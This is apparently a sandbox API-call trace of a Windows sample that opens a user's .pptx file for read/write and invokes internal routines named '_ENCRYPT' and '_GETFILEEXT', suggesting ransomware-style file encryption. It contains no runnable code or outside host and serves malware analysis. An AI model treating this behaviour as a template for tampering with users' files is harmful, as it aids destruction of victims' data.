RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0036.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0036.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e) returned 0x7f3688 [0036.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx", cchWideChar=78, lpMultiByteStr=0x7f3688, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx", lpUsedDefaultChar=0x0) returned 78 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.206] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\jiof8cjeekxryv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=78, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9c) returned 0x7d8558 [0036.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=78, lpWideCharStr=0x7d8558, cchWideChar=78 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx") returned 78 [0036.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0036.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0036.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.209] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.210] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0036.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0036.210] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0036.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.211] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0036.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.212] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ad8 [0036.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.212] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0036.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.213] CloseHandle (hObject=0x128) returned 1 [0036.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0036.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.213] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.213] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.214] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.214] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.214] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.214] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.214] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 